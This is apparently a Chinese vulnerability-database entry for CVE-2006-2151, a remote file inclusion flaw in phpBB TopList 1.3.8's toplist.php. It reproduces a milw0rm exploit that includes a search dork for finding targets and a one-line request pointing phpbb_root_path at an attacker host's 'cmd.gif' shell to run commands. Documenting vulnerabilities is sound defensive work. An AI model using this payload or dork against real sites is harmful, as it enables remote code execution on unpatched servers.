phpBB TopList toplist.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110149 漏洞类型 未知
发布时间 2006-04-27 更新时间 2006-05-03
CVE编号 CVE-2006-2151 CNNVD-ID CNNVD-200605-053
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1722
https://www.securityfocus.com/bid/87664
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-053
|漏洞详情
phpBBTopList1.3.8及之前版本的toplist.php存在PHP远程文件包含漏洞。当启用register_globals时,远程攻击者可以借助phpbb_root_path参数包含任意文件。
|漏洞EXP
Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
URL: http://www.phpbb2hacks.de/toplist-df148.html
Dork: inurl:"toplist.php" "powered by phpbb"
Credits: [Oo]

Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-27]
|受影响的产品
phpBB Group Phpbb Toplist 1.3.8
|参考资料

来源:VUPEN
名称:ADV-2006-1601
链接:http://www.frsirt.com/english/advisories/2006/1601
来源:SECUNIA
名称:19884
链接:http://secunia.com/advisories/19884
来源:MILW0RM
名称:1724
链接:http://milw0rm.com/exploits/1724
来源:XF
名称:toplist-toplist-list-file-include(26172)
链接:http://xforce.iss.net/xforce/xfdb/26172
来源:OSVDB
名称:25260
链接:http://www.osvdb.org/25260